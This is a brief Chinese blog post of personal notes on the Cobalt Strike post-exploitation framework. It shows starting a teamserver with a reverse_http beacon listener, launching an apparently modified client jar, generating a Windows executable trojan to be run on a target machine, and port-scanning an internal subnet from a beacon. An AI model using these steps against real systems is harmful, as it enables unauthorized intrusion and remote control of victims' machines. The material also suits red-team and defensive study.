Cobalt Strike基础

作者: const27 分类: 内网,提权/后渗透 发布时间: 2020-09-04 04:55

并非系统学习,只是记录有用的点

启动

这里只记录linux’环境(因为我比较偏好于用linux进行后渗透)

启动服务端

在cobalitstrike目录
bash teamserver ip pwd  ip设置为当前机器的IP(可内网可公网)  pwd设置为一个密码
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 50050
[*] SHA256 hash of SSL cert is: 7b49fc589e7e738e3457859d269996ecef83f693570b0ac482c426b1fa04bd73
[+] Listener: ok (windows/beacon_http/reverse_http) on port 4444 started!

启动客户端

服务端启动了,就该启动客户端了

在cobaltstrke目录
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
进入GUI界面  只需修改IP和密码为服务端设置的IP与密码即可

木马生产

EXE文件

Attacks->Packages->Windows Executable

然后选择exe可执行程序并选择一个监听器,把exe程序放到目标机让他运行即可

上线成功

信息收集

对内网网段进行扫描

beacon>portscan 192.168.52.0/24  //这个还能自动扫出端口

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

Leave a Reply

Your email address will not be published. Required fields are marked *

标签云